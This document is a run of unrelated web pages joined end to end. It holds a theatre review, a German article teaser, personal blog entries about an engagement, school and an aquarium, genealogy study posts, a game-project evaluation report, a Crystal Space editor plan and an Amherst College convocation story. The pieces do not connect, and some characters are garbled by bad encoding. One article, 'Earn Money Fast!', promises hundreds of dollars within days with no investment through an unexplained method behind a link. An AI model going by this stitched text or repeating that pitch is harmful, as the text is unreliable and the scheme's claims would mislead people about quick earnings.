My favorite part of the show was the girls' costumes. The 80's had such defined fashion, and these girls didn't disappoint with sparkly frocks, fringe boots, and plaid skirts. Their song "Girls Just Want to have Fun," sung by Murphy, Maggie Hutchinson, Anna Hastings, and Colette Worthington, was my second favorite song in the show with their iconic dance moves.
The show is riddled with 80's references; Feargal working with nerdy Billy Gates on computers, a karate class taught by Mr. Miyagi, and of course a Star Wars number that will have you laughing in your seats.
BACK TO THE 80S plays at Theatre in the Park for just two more days, and you don't want to miss out! Go to https://www.theatreinthepark.org/ticket-options for tickets.
|So entschlÃ¼sseln Sie externe Laufwerke am Mac|
Wer beim Schutz seiner Daten auf Nummer Sicher gehen mÃ¶chte, der verschlÃ¼sselt nicht nur die eigene Festplatte, sondern auch externe Laufwerke und USB-Sticks. Dennoch kann es vorkommen, dass man den VerschlÃ¼sselungsschutz samt Passwort bei dem externen GerÃ¤t entfernen mÃ¶chte, damit einÂ freier Zugriff auf das Laufwerk gewÃ¤hrt wird. Wir zeigen Ihnen, wie das auf Mac-ComputernÂ schnell und einfach funktioniert.(Weiterlesen)
Today started like any other Sunday, waking up late and lazy and having a delicious breakfast (smoothies and peanut butter toast). Then we quickly packed up and left for an afternoon hike in Auburn at Hidden Falls Regional Park. We walked about forty minutes along the trail until we got to a beautiful secluded spot with trees all around, with a very convenient picnic table, where we took out and enjoyed our pasta salad, chocolate covered almonds, and sweet tea. After lunch we continued down to the falls, which were beautiful and also very crowded, so we didn't stay long.
We sat down and enjoyed the scenery for a while, and had fun taking some pictures with Nick's fancy camera and the teeny tiny tripod. We had a hard time finding the right soft light but eventually got it right! It was set on a delay and took five pictures at a time. It was a beautiful day and was about three o'clock in the afternoon.
Nick set up the camera one last time to get a picture of us sitting down. He set the camera up and then walked back over to me, but instead of sitting, he got down on one knee and asked, "Will you marry me?"
Of course, the answer was YES! It came out "Duh!" first, of which I am not very proud of, but looking back is pretty funny. I said "Yes!" immediately after, so hopefully that fixes it. Nick just laughed.
Their reaction was great! Nick's mom clapped both hands to her face and gasped, and they were all so surprised! They were also happy, which made me happy too, because I really love Nick's family. We spent about fifteen minutes there talking about how he asked, and when the wedding might be, and admiring my ring, and then his dad had to leave to pick up his grandparents from the airport (they just got back from Hawaii!) and so we left and drove to my parents house.
My mom was still out but would be coming back in about a half hour, and my dad had a member of his band "Close to You" (Carpenter's tribute band, they sound great!) over to practice, so I twisted my ring around so it looked like just a band and we pretended everything was normal. For over two hours, until the friend left.
IT WAS TORTURE.
It was pretty funny afterwards, though! I was dying to tell everyone and was having the hardest time keeping my hand from flinging out and accidentally giving it away. I kept my hand curled over and at my hip a lot, and spent the whole time my mom was back avoiding her. Last night we went out to the symphony with my parents, and my mom noticed that I had taken off my normal small diamond ring from when I was sixteen and was wearing a different costume ring. I knew she would notice this, so I had to stay far away! Nick and I took the dogs for a walk around the circle, and I spent a lot of time running around checking on the cats, and bringing in dog food, and looking at the flowers, and not talking to mom.
Today there was a solar eclipse! We poked a hole in paper with a pin and used it to cast the light from the solar eclipse onto another piece of paper. It was very cool, but also hard, because my mom was always there and I was so afraid she would see my ring and we would have to tell them then! I wanted it to be a big surprise.
After dinner the band friend left (I felt bad, I spent the whole time wanting him to leave instead of making him feel welcome) and we were sitting outside on the deck eating cantaloupe and mango and strawberries when I brought up our hike. Mom asked us how that went, and I said, oh, fine, you know, we saw the waterfall and then walked out to this beautiful secluded area by the river and Nick gave me this. And I held up my hand.
Mom and Dad just froze, and Dad asked, "What kind of ring is that?" and I said, "An engagement ring!" and then they kind of exploded and were like "WHY DIDN'T YOU TELL US!" and they got up and gave us hugs and were so excited and happy and it was so much fun! And Troy was on his computer and only paid attention at the part where mom and dad freaked out so he was like, rewind and tell the story again! So we did.
Currently my mom has sent me about five different emails with wedding venues that look good, and is so, so excited. She has been watching wedding shows for a while since she knew Nick and I were serious. Now she has a reason to plan and be excited! She and dad I think are both very happy for us, and a little bit melancholy for when we were little kids and not getting married. Troy is kind of shocked and keeps saying "I feel old!", but is also being so sweet and happy for us.
I called all my family and friends and shared the news and they are all so happy for us! Everyone loves Nick already so it was so great to tell them that we were making it official! It was really a very fun evening, and we appreciate everyone's congratulations and good wishes!
Nick and I are very happy and kind of overwhelmed right now. Tomorrow we are driving back up to Auburn to tell his grandma in person and to drive to my Nanny's and see her in person. I have some more calls to make and then will post it on facebook to let everyone know.
I feel so very lucky and extremely happy right now!
|Catching Up . . .||Well. I certainly seem to excel at waiting months between posts and then writing a belated summary of events, don't I? We'll see if I can nix that habit, but for now I will continue in that glorious tradition:|
Work is going great: I love the kids that I teach computers to and my coworkers are all made of awesome.
ONE WEEK OF SCHOOL LEFT OMG. Technically two, but I do not have finals so HA SUCKS TO BE YOU NICK. Mwahaha!
Speaking of Nick, things are going great! Coming up on 4 1/2 years next month! And wow, it seems like our 4 year anniversary just happened, where the heck is time going? I have a feeling I am going to be one of those perpetually bewildered old people, always wondering how I suddenly got to be old when just a few minutes ago I was typing this post!
We're started going to the Farmer's Markets around us, and WOW real tomatoes taste amazing! I've been snacking on raw broccoli and ate a pear for breakfast and the oranges are so delicious and the eggs are tasty and the apple juice is . . . well, actually not as good as I hoped, I will try a different vendor next time. Overall, however, we love it.
My Uncle Steve is doing good! His fight with the brain cancer glioblastoma is documented here. To summarize: his surgery went well, his chemo sucked but he did it, and his latest MRI was the best it could be! There have been a lot of ups and downs and scary moments, but right now is good.
Oh! Hey! I got an ipad 2 for Christmas and I LOVE IT SO MUCH.
We ran in the Davis Lucky 7k and finished in like 48 minutes, or something. I forgot. But we did finish! We keep talking about doing more and then we don't. But I have found three new races in Sac that look interesting, so I will keep you posted.
I have one semester left at Sac State, and then I graduate! I should be graduating in December of 2012!!! Yaaaay!
That means I have to decide where to get my credential, and possibly my masters. Eep!
As for me, I keep pretty busy between work and school, especially this semester. I had to do 70 hours of fieldwork at 4 different sites, and write a lot of papers! That plus upping my work from 2 to 3 days a week teaching plus 2 days after-care . . . was challenging at times, but generally I enjoyed it. My stomach has been behaving (remember those days of gastritis/IBS/acid reflux? Me neither. Yay!) My biggest stressor lately has been trying to keep our apartment clean. That, plus wishing we had more sunshine on our patio so I could grow some non-shady plants (I would kill to grow some basil!).
Hopefully I will remember to update this blog every now and then. ^_~
|Back in the Swing||We are now five weeks into the fall semester of college, and six weeks into teaching computers at the elementary school.|
I'm kind of tired.
But in a good way!
Work is fun. Today I taught 3rd graders the entire left hand homerow for typing, showed 4th graders how to make a pie chart with M&M's (that they got to EAT after, whee!) and 7/8th graders how to do the basics of html. The only problem is I don't have as much time as I would like to spend on my lesson plans as I would like, because . . .
Yeah, school. It's kind of homework-y. The last two or three weeks each Sunday has been like 7 hours of homework. In a ROW. That is a lot of homework. Plus, ya'know, trying to actually spend time with my boyfriend (who is still wonderful) and my family (who are also busy) and Nick's family (Hi Clair!) and I am just BUSY.
(Notice I am up at nearly 1am on a school night just so I could have some goof off time. Normal hours rebellion, ahoy! Also, zzzzzz.)
Um. What else. Taekwondo is good! Mostly. And I did a cardio class! And got really sweaty. Um, I need to clean my fish tank. I need to clean my apartment. The list of things I need to do is kind of long, so let's just skip that and I'll say I'm totally going shopping tomorrow morning, because Kohl's gave me a $10 off coupon and I need work clothes! Yay, shopping!
I'm off for bed.
|Craaaaazy Girl||"Crazy Girl" by the Eli Young Band is adorable. Just throwing that out there. (It's a country song, don't listen to it dad!)|
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
On Saturday I broke down my 20 gallon freshwater aquarium and moved it to our apartment. That . . . was fun. Yeah. Just about seven whole hours of fun. Whee! (Tips for moving aquariums may follow in the future, but right off: 5 gallon Home Depot buckets with lids are awesome, don't use styrofoam because they leak all over your trunk and your jeans and are super hard to carry, move as much of your cycled water as possible, at least 50%, and once you're all done setting it up test your water again because the new water will not be the same pH. Oh, and if you are a crazy girl like me and decide to change the substrate at the same time, wash it ahead of time and leave some of your old gravel in a nylon hose in the new tank so that your bacteria from the old gravel keep the aquarium's chemistry levels from bouncing all over and getting new tank syndrome. It seems to be working so far!)
We also purchased six ghost shrimp and two mystery snails, and they are adorable. My corycat is SO much happier with the new sand substrate instead of harsh gravel, and my killifish is killing me with his possibly being sick but then being perfectly fine and MAKE UP YOUR MIND ALREADY, DAMMIT. Oh, and if he is sick then I can't treat him with my malachite green because apparently it is bad for invertebrates and snails. AWESOMENESS.
I am totally obsessed with my tank again, yay! I want more tanks, including a super awesomely expensive saltwater, not yay!
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
The private school I work at as the computer teacher/after-school teacher has their graduation tomorrow, and a field day on Wednesday where the staff and parents play the kids in a softball game and have a bbq! Should be fun!
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
I . . . have run out of things to talk about. My brain is going a mile a minute about tanks and aquarium plants and getting gourami and how I want angels but need a taller tank but I've had angels before but they've died after a year or so and waaaaaaah. If only money wasn't an issue! (Sob!)
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Oh yeah! Kauai! I go to Kauai on the 22nd until the 2nd, with Andra! Yaaaay!
|ESM's QuickLessons A DearMYRTLE Genealogy Study Group Lesson 20|
QuickLesson 20: Research Reports for Research Success
Elizabeth Shown Mills, âQuickLesson 20: Research Reports for Research Success," Evidence Explained: Historical Analysis, Citation & Source Usage (https://www.evidenceexplained.com/content/quicklesson-20-research-reports-research-success : accessed 17 Sept 2016).
This week we will be discussing the research process.
How do we do our research?
How should we do our research?
Can we improve how we research?
With the growth of the internet how many of us can find ourselves joining in with the quick click genealogy we frequently criticise.
Why do we criticise this way of doing things?
So what should we be doing?
Ask yourself these questions.
We can use pen and paper or our computers to assist in these tasks.
We know how to interrogate the databases online and how to enter our results in our software program. There is plenty of information to tell us how to do this either digital or paper.
Do any programs tell us what we need to look for?
Do any programs tell us whether what we find is relevant?
Poor preparation and lack of analysis can lead to hours of wasted research.
How can we know what we need to find if we have not analysed what we already know.
Creating a research plan will be the best thing you do. It will keep you on track.
If we wish to move on from being just "information gatherers and processors" as ESM states in this lesson we must consider how we approach our work.
This weekend I came across an individual who had been recorded by another researcher in the Wiki Tree website with the maiden name of ROSLING. However this was not the surname for the parents. The link to the 1911 census revealed that she was recorded as their adopted daughter. There was also a link to an army record showing her date of birth in keeping with the census record.
I am researching the surname ROSLING and was interested in knowing where she fitted in the lineage I am constructing.
If I just entered her name in a search would I find anything and how would I know if what I found was relevant.
Experienced researchers will often know exactly where to research and which records may help them find what is available. This does not preclude them from the planning stages but it may reduce the time needed to formulate the plan. Even the experts find themselves stumped occasionally and have to consider alternative strategies. Researching in a new area be it geographical or an unfamiliar set of records may require a different skill set and a whole new learning experience. If we are to complete a thorough research we have to be aware of the resources available.
Even the best plans may need to be altered in the light of new information. Being prepared and analysing what has been found may alter our focus or the manner in which we carry out our research.
The ability to plan and analyse helps us make better use of the research time.
Complex questions may only be answered if we look at all the information we have and understand what it's telling us.
Some researchers have found that a program such as Evidentia can help them formulate a plan for these complex problems. By entering each piece of information deciding what it is saying and importantly how reliable that information may be we have a clearer understanding of what we already know.
The source of any information may be flawed. Awareness of the reliability and being able to resolve conflicting information are analysis skills that may only come threw experience and education.
Learning from others and sharing personal experience helps each of us become better researchers by improving the knowledge base.
Do we read any accompanying information about a record group that we find online before we enter a name in the search box. If not, why not, surely we need to know if the record will be likely to provide us with the information we need before we search. Would you travel miles to an archive or cemetery without checking that they have what you are looking for first. The same should be true for online records. Finding information and blindly entering it into a database is as boring and pointless as writing lines was as a school punishment. If you want the reward of finding that elusive connection you need to spend time preparing and analysing, formulate a plan, familiarise yourself with what may be available, pinpoint the best way to approach the task and adapt the plan as and when more information is discovered. Not forgetting that negative results do not mean negative evidence, it may be that any record has just not survived.
As we near the end of this study group, we need to pull together all that we have discussed.
I am writing about my research mentioned above on my One Name Study blog. I have not included specific examples this week as I believe that this lesson is more about understanding the process and the importance of doing this well.
Only we as individuals know whether we have been disciplined in the past.
Hopefully our discussions may have helped at least one of those watching to become researchers rather than gatherer/processors.
Researching when few records or indexes were available online and internet access was expensive.
I was not aware of research plans so I would go armed with notes that I had made to guide my research.
Whilst looking for ancestors in the BMD indexes on microfiche I would have a name, range of years, and geographical area. When I found a possible candidate I would record and order a certificate.
The only way I could access the census was using indexes and then when I could get to the local archive I would have to scroll through the microfilm to find what I wanted.
The internet has made finding many records easier but has it also created a group of individuals who may believe the adverts that show families building trees using only the online website.
No website will ever contain all the records and whilst the records support our research they are not the researcher.
Who pieces together which record is relevant to each individual, who is related to who and how are all these individuals related, it is us as researchers who analyse the information and decide its relevance.
The reporting suggested by Elizabeth Shown Mills may sound quite prescriptive and academic and unless you have an academic background you may switch off at the thought of report writing. However what she is saying is this.
Personally I would say that Evidentia will help you do all of these in a guided way.
Finally here is a link to a Google Sheet I created called The Family History Research Process. It contains links to documents that others may find useful. Please add your comments if you think I may have missed something useful that could be added.
|Making Progress - Making Distractions|
IntroductionIn this post I will discuss why I am not following the Organisational Prompts in the Get Organized challenge.
What I am doing instead.
The challenges this approach has had and how I have dealt with them.
FINALLY Get Organized challenge
This year I had intended to follow along with the weekly challenges set by DearMYRTLE in her FINALLY Get Organized prompts.
I had previously done much of what was suggested, somewhat fortuitously, with the week coinciding with catching up at work after the Christmas and New Year breaks.
This was where I started to see that the system being suggested was close to what I had previously tried. This way of organizing I had found to work for some of my digital files but not everything.
Organizing by family group works for items specific to that family but stumbles when previously unconnected groups collide. One example of this would be a group photograph at a wedding or a newspaper report of that same event.
I am trying to avoid duplicates of the records and have devised a modified version keeping the family group as a hub containing an index to the relevant documents and other media.
I have gradually realised that a key element in citation is being able to accurately pinpoint the provenance of the source. Whilst digital files can have this information embedded in the properties it is a greatly underused function. Most of the files just contain the filename for that computer and a date. Making use of this ability will take time so I have started with a quicker fix to ensuring the correct provenance is recorded.
This is a screenshot of my system as it stands today
I discussed this system briefly in my featured earlier post.
The Media file in my Family Historian project has subfolders which I have colour coded using Folder Marker .
I have further subdivided the folder named Official Archives as shown below
I expect some of the folders will be moved, renamed or deleted as I decide the best place to use for those census images and other items I have downloaded. I need the flexibility at present that this system provides. I also want something that can be easily modified at a later date.
The process has been far from straightforward and I find myself having to go through earlier emails trying to discover who sent me pictures or documents. When I find the relevant email I have sent it to Evernote and added tags.
This has slowed down my folder organization but will pay dividends when I start to rebuild my tree as part of my Genealogy Go Over.
I did not create a research log when I started out so I am going to create one retrospectively from interviews, photographs, scans and correspondence to ensure the sources are correctly cited.
If I am unable to accurately date something I can no longer replicate, such as an interview with a deceased relative, I will date with a year range.
I am sure I will find other distractions to send me "off course" but hopefully most of them will help me attain my ultimate goal to get organised and digitised so I can find, analyse and preserve the history of our family.
|More Than I Hoped For||It's over. Those two simple words now describe my Writing for the Internet class. This class was much more than I was expecting and hoping for. When I walked in to sign up for classes on my orientation day, they sat me down at Dr. Jerz's table. He walked me through choosing a few classes I had to take, and then he introduced me to a class of his, Writing for the Internet. I decided to take the class. I'm not sure exactly what I was expecting, but it definitely was not what I got.|
These are some of the main things I got out of this class.
I gave suggestions and encouragement to
Other's final thoughts on the class.
|Ephenation evaluation report|
Vision of Ephenation
To have a game like World Of Warcraft, where players are able to add their own adventures. I think this is a probable future development. This type of games should be fully realized and generally available in something like 10 to 20 years.
The size of the world should not be limited. It is easier to implement a flat world than a spherical world, and a flat world can be unlimited. The nature will obviously have to be created automatically.
This is not possible, of course, but the number of simultaneous players should be big. Limitation to 10 or 100 is much too small, as everyone would more or less know everyone and work on the same project. A minimum would be 1000 players, but preferably more than 10000. That will lead into a situation where you always meet new players you don't know, and the world is big enough so as to always find somewhere that you have not explored.
Most RPG type of games have a limited set of levels. But that will put a limit on the game play. After reaching the top level, the game is no longer the same. Not only that, but there is a kind of a race to reach this top level. Instead, there shall be no last top level. That will put an emphasis on constant exploration and progress.
Players should be able to allocate a territory, where they can design their own adventures. This territory shall be protected from others, making sure no one else can interfere with the design.
The community and social interaction is very important. That is one reason for the requirement to support many players, as it will allow you to include all friends. There are a couple of ways to encourage community:
It shall be possible to design interesting buildings, landscapes and adventures. The adventures shall be advanced enough so as to support triggered actions, with dynamic behavior that depends on player choices.
This is a description on how the project was executed. It was started end of 2010. Most of the programming was done by me (Lars PensjÃ¶), but I got support with several sub modules.
It was decided to use Go as the programming language for the server. Go has just the right support for this type of software:
The disadvantage of Go when the Ephenation project was started, was that Go was a new language, in transition, with uncertain future. This turned out to not be a problem, and the language has today a frozen specification (Go 1).
To be able to manage the massive amount of players, quadtrees are used for both players and monsters.
It is the server that has full control over all Model data. Player attributes, melee mechanisms, movements, etc.
The client was initially designed in C, but I soon switched to C++. There are still some remains from C, which explains some not-so-good OO solutions. OpenGL was selected, instead of DirectX, partly as a random choice, but also because I wanted to do the development in Linux.
It was decided to use OpenGL 3.3, instead of supporting older variants. There are some nice improvements in OpenGL that makes design easier, which was deemed more important than supporting old hardware.
The world consists of blocks, voxels. This is difficult to draw in real time with high FPS, as the number of faces grow very quickly with viewing distance. Considerable effort was spent on transforming the list of cubes into a list of visible triangles. It is also difficult to make a level of detail (LOD) algorithm that gradually reduce details on long distances.
Another technical difficult with a world based on cubes was to make it look nice, instead of blocky. Some algorithms were investigated that used a kind of filter. As the view distance is limited, there can be a conflict when being underground.
The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or from a dark background (typical to being underground). A compromise is used, where the color of the distance fog depends on the player being at a certain height.
There are strict requirements on the protocol. If a server shall be able to handle 10000+ players, the communication can easily become a bottleneck. TCP/IP was selected in favor of UDP/IP, to make it easier to handle traffic control. The protocol itself is not based on any standard, and completely customized for Ephenation.
There are two major choices. Either use a scripting language to control the aspects of the world, or a graphical approach. A scripting language is more powerful, but on the other hand it is harder to learn. There is also the problem with supporting a massive amount of players, in which case time consuming scripts would make it unfeasible.
The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.
The client side was designed from scratch, instead of using an existing game engine. This may have been a mistake, as the main development time was spent on graphical technology, instead of exploring the basic visions.
Adventure design and mechanics
The set of blocks and possible actions with "activator blocks" are currently limited. It is not enough to construct full adventures that are fun to explore and provides great entertainment.
The basic world is automatically generated. This usually make a game of limited interest, as game play is bound to become repetitive. Support from initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior was not added until later, which unfortunately lead to most part of the current world being too static.
The graphics is working, but far from a production level. There are several glitches, e.g. camera falling inside the wall and lighting effects cut off. As the world is dynamic, the possibility to do offline precalculations are limited. That means most graphical effects has to be done live, which is a difficult requirement. For example, it is not known how many light sources that should be possible to manage. It was chosen to use a deferred shader, which improves the decoupling from geometry and shading.
The social side of the game play has been explored very limited. There are ways to send message to nearby players, and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.
The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1000 players at random position with a uniform density. These players simply walked around. If they were attacked, they attacked back again. If they were killed, they automatically used the command to revive again.
On a Core I7 with 8 GBytes of RAM, the load from the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non linear dependencies. There are known bottlenecks, for example monster management that is currently handled by a single thread. That means at most one core can be used for this, but it should be possible to distribute this task into several smaller goroutines.
The communication was measured at around 100 MB/s. With linear scaling, it would be 1GB/s for 10,000 players. The intention is that the scaling should be linear, as cross communication between players is designed to be of constant volume. Still, it remains to be proven.
There is the obvious question whether the simulator is representative to real players. One way to improve that assessment would be to measure the actual behaviour of real players, and compare with the simulator.
Another possible bottle neck is the communication with the player database (MongoDB). This depends on the number of login/logout and auto saves. It also depends on load generated from the web page. This has not been evaluated. Typically, an access takes about 1ms. The MongoDB is currently located on the same system as the game server, minimizing communication latency. The database will have to be managed by another computer system for a full production server.
The objects that the player can wear and wield are simplified. As the game as a concept is unlimited, it is not possible to hand craft objects. Instead, there are 4 defined qualities for each object, per level.
TCP/IP has a higher overhead than UDP/IP. Some packages are big (the complete chunks), which would have required several UDP/IP packets and a complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for evaluation of the project.
As the server is responsible for all object atributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates some data, so the update is limited to nearby players. Because of this, the client need to do interpolation to be able to show smooth movements, and the client need to be able to manage stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat. The client source code is available, and it would have been easy to do changes.
I believe the computers will continue to grow more powerful exponentially for many years still. However, the full power will probably not be accessible unless the game server can scale well with increasing number of cores. The performance test were done on hardware from 2011, and there are already much more powerful equipment available.
As a proof of concept, I think the project was successful. The thing I miss most, is a powerful enough mechanism that supports custom adventures. This is a key point of the game concept, but I believe, with more personnel involved, that new ideas would be available that would improve the possibilities considerably.
Document update history2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.
|Earn Money Fast!||By Tommy Anderson |
Are you tired of chasing "earn money fast" methods in hopes that THIS TIME, you have found a way that actually works? Then make yourself a promise right now - read this whole article. Then take action - follow every step and don't stop till you're done. If you do, I promise you that you not only will earn money fast - you will make money today - even within the next hour or two.
The best part? You will make money with no money. There is no investment here. Just an honest (albeit unconventional) method to earn money fast.
This method is known as Paid Forum Trading, but it has nothing to do with stocks, don't worry.
I was extremely broke last year and I used this wonderful method to earn money fast - to the tune of almost $400 in 4 days. Not bad when you consider that I sat in the comfort of my own home, sipping coffee and working on my computer. From what I remember, I'd say I didn't put in any more than 3-4 hours per day.
Although its specifically designed for someone to earn money fast, this method does have some limitations. The main one is that there is a cap to how much money you can make. After working for about a week, you'll top-out, at which point you won't make much money anymore. However, by that time, you will have made several hundred dollars, which, when you're running low on cash, is a real life saver!
Remember, this is not a "business opportunity" - this is a very straightforward, honest way to earn money fast - as in today. (Having said that, there IS a way to turn this into a full-time living - for free of course. This is covered in detail on the web-site, for those of you who want to go beyond just making quick money).
...you know that feeling you get when you put on a jacket you haven't worn in a long time and find a $20 bill in your pocket? That's how a lot of people describe this method - myself included. It blows my mind how someone came up with this concept to earn money fast, and how, several years later, it still works - every time.
For more information on this method, visit: http://makemoneyfastthehonestway.com
Tommy Anderson is a successful online marketer who specializes in making money fast, followed by building a solid residual income online. His passion is showing struggling online marketers how to earn money fast by taking advantage of the web's best kept secrets and strategies.
Article Source: http://EzineArticles.com/?expert=Tommy_Anderson
|The Place of Internet Marketing|
By Monica Kumar
Several developments in Technology have completely transformed the world and made life easier for people in the transaction of business and work. Notable among these is what is called "internet marketing". In essence, this activity enables buyers and sellers of goods to get their tasks accomplished without the necessity to travel. It may be defined as the marketing of products and services over the internet. Among the benefits, we can mention the low cost of distributing information to a wide audience and advantage in the form of instant response.
Features of Internet marketing
1) It straddles the entire world and people from widely dispersed geographical locations can transact business with each other.
2) Business organizations can reach a large clientele for a fraction of the traditional advertising budget and thus it is less expensive.
3) Thanks, to the nature of the medium, consumers can conduct research while browsing, and purchase products and services according to their own convenience.
There are various fascinating facets associated with internet marketing and one of these form a link between the creative and technical aspects of internet technology. It is natural that design, development, advertising and sales activities come under this category. Again the methods cover a wide spectrum such as search engines, display advertising, email marketing and affiliate marketing.
Many business models that can work in tandem with internet marketing are now available. Prominent among these is e-commerce in which goods are sold directly to the customer or business houses. Secondly, lead based websites where an organization generates value by getting sales leads from their site. Besides there are several other models which depend on the specific needs of individual or businesses launching a campaign for internet marketing.
How does Internet marketing differ from "off Line Marketing"
There are several ways by which internet marketing differs from traditional or what we call off line marketing.
a) Customer browses the internet on their own with the net result that marketing messages reach them personally. The users, for instance locate advertisements for specific products or services with the help of specific key words. This is one to one versus one to many approach.
b) In an online marketing campaign, it is possible to trace measure and test almost all aspects of the campaign. It is possible to identify the messages or offerings which are more appealing to the target audience. Here the advertisers pay per banner impression or per click of the mouse or per action or result that is effective. This feature ensures "measurability".
c) In internet marketing, the users access the products of their choice by activity on their part, whereas traditional off-line marketers target their markets according to age group, sex, geography and general criteria.
d) All initiatives connected with internet marketing require the users to click on the message, go to a website and perform a specific targeted action. Hence the results of advertising campaigns are at once tracked and measured. By contrast, in traditional marketing, it is extremely difficult to measure the actual readership and even actual impact of an advertisement.
There can be no doubt that internet marketing has grown considerably in the last 3-4 years even in the developing countries of Asia. In the US, the UK and Europe, it has almost become a routine, thanks to widespread availability of personal computers, laptops and internet facilities on mobile phones. Today, every
Mobile professional has the need to remain connected with the world, while on the move. He can easily avail the benefits of Internet Marketing from his cell phone. Moreover he can also get in touch with the company through emails. These days there are various options available which allow users to free access to emails form their mobile phones. Like one can easily send an email through free mobile email services by clients like gmail, email@mobile, etc
Thus the trend of internet marketing is most likely to inject a greater sense of accountability on both the advertising agencies and their clients.
Monica is a vetran in the field of writing and loves to share her views with her readers. Please feel free to contact her at email@example.com
Article Source: http://EzineArticles.com/?expert=Monica_Kumar
|Introduction and First Thoughts|
Hi! I was accepted to build a Crystal Space World Editor for Google Summer of Code this summer.
A little about me: I'm an 18-year-old computer engineering major at University of Maryland. My main interests beside computers are classical guitar and biking.
In this blog I'll post my ideas and progress on this project. Comments and suggestions will be greatly appreciated.
Here is the abstract as given in the proposal:
Crystal Space, being a 3d engine, deserves a good art pipeline so that applications using it can focus on creating assets, not editing world files by hand. Having worked on several game projects using CS over the past 2 years, I have experienced directly the difficulty of getting art into the engine. I would like to help take a huge step in improving it by creating a usable world editor.
The editor should have a completed framework by the end of the work period, including a working plugin system, undo/redo system, selection system, tool system, save/load functionality, scene browser, factory browser, and property editor. Also, basic selection and transform tools will be implemented. Any remaining time will be used to polish the user interface or implement tools for other CS features, such as terrain.
The project is currently in the design stage, but the ideas are becoming more focused.
Name of the editor
We had nearly an hour-long name-throwing session on IRC about this, but I don't think any of them stuck. The consensus seems to be that the name shouldn't be too serious. Some highlights: Ochre, Composotron IV, Crystal Latte, Crystachino, Deity for Dummies, Quartz, Chainspoon, Turbospoon, CrystalGarden, Plow, Colloid Space. I would choose Anvil, but it is already the name of my old editor. Maybe Anvil Reloaded? ;) Any more ideas?
The editor will use wxWidgets as a GUI library.
wxAUI has been included in wxWidgets 2.8.0+, but wxPropertyGrid is a contrib widget. To handle the dependency, the editor will probably require wxWidgets 2.8.0+ and wxPropertyGrid will be included in the source tree.
I'll use wxFormBuilder to design the more complex dialogs for the editor (options, material editor, etc) and save them as XRCs. The main window will be done in code, using wxAUI.
Tools allow the interface to remain consistent when switching between different editing functions. Tools will handle events like mouse move, mouse click, keyboard press, and draw to allow for extra information to be drawn on top of the scene. Examples of tools are select, move, rotate, scale. Plugins can also add tools. Tools will be available through a toolbar. In addition, tools can provide a panel for tool-specific settings.
There are several types of tools.
Mesh-specific tools: These tools will be shown based on the type of the selected object.
Creation tools: Tools which create things, e.g. a tool which creates mesh primitives, or a tool which creates an initial flat terrain.
One-shot tools: Tools which perform one "non-interactive" action, like "compress vertices" or "generate normals".
The scene browser is basically a tree that will show all of the instances in the world file (e.g. all the stuff that goes in between <sector> tags).
There could possibly be multiple "view modes" for this: Group by sector, group by object type, sort alphabetically.
Plugins should be able to add 3rd party types to the scene browser (e.g. CEL entities).
This should show some of the files that the world file depends on. It will allow you to link or unlink libraries to the world file.
Formerly named "factory browser", the assets browser will allow you to browse through mesh factories, materials, etc. It should allow you to remove them, or edit their properties when selected (in property editor). Adding mesh factories can be accomplished through importing or linking to a library. Or you can use a tool which creates primitives.
This will show all of the available mesh factories, rendered to textures. The selected one will show a rotating preview.
This will show all of the available materials rendered on tiny spheres. You should also be able to create an empty material from here.
With all of these browsers, there seems to be a commonality between them: they generally provide a view of a certain category of objects, and when selected, they should publish an event to listeners, including the property editor which will allow you to edit the selected object. It seems like they could share a lot of code.
There will be a property editor shown for the selected object.
I will need to implement some custom property types, including one for matrices.
Another thing I would like is a "link" to another object. It would basically allow you to choose one of the available objects of that type. And it will allow you to follow the link and show the linked-to object in the property editor. For example, the mesh instance property editor will have a link property "Material", which will allow you to choose which material is used for the mesh.
Since the saver doesn't fully support saving all CS objects, and since it is desirable to preserve comments in the world files, I'll be supplementing the loader to attach the original DOM nodes to engine objects when they are loaded (and only when the saveable flag is on). The editor will then keep track of which objects are modified, and only save those. This means that all unsupported nodes will be preserved. A main failure of the current way of using the saver is that it obliterates any unsupported nodes. Judging by the rate at which the loader advances versus the rate at which the saver plugins advance, this will be necessary for some time.
The sooner this is implemented, the sooner the editor will be useful for making small tweaks to existing world files. So I do regard it as quite important, although it is not trivial.
Whew! There are a lot of ideas there. I hope I get some good feedback on this.
I still have approximately 2 more weeks of school, so I'll be trying to think of this and post when I'm not taking exams. Then, summer! :)
Loading the player...
September 4, 2012
Amherst marked the beginning of the 2012â13 school year with Opening Convocation at Johnson Chapel on Sept. 3. The first formal gathering of the first-year class, the annual ceremony enables the collegeâs president and the faculty, dressed in their academic regalia, to officially welcome the new students. Every year, it features a procession, music by the Choral Society and the awarding of master of arts degrees to faculty who have reached the rank of full professor but arenât graduates of Amherst. (View photos of the entire event at the Amherst College Flickr set.)
In this yearâs Convocation address, President Biddy Martin commended the members of the Class of 2016 for having the courage to learn, to be challenged by new ideas and to âcombat our own willful ignorance.â âCritical thinking cannot be programmed, but it can be exemplified,â she explained to the audience of first-year students, faculty, staff and others. âIt is our job to exemplify it by turning our analytical skills and our patience outward but also inward toward ourselves. The quality of this institution depends on the willingness of our students and faculty and everyone else who works to put their âtaken-for-grantedsâ at risk.â
She discussed the relationships the students would cultivate at college and reminded them of the value of their Amherst education as well. The latter, she told them, is âa launching pad or platform for the work that needs to be done to address the monumental challenges in the worldâeconomic, political, cultural, environmental.â¦ Itâs an opportunity to learn not only how to think but [how] to relate to people from every conceivable background, how to engage the world and how to lead.â
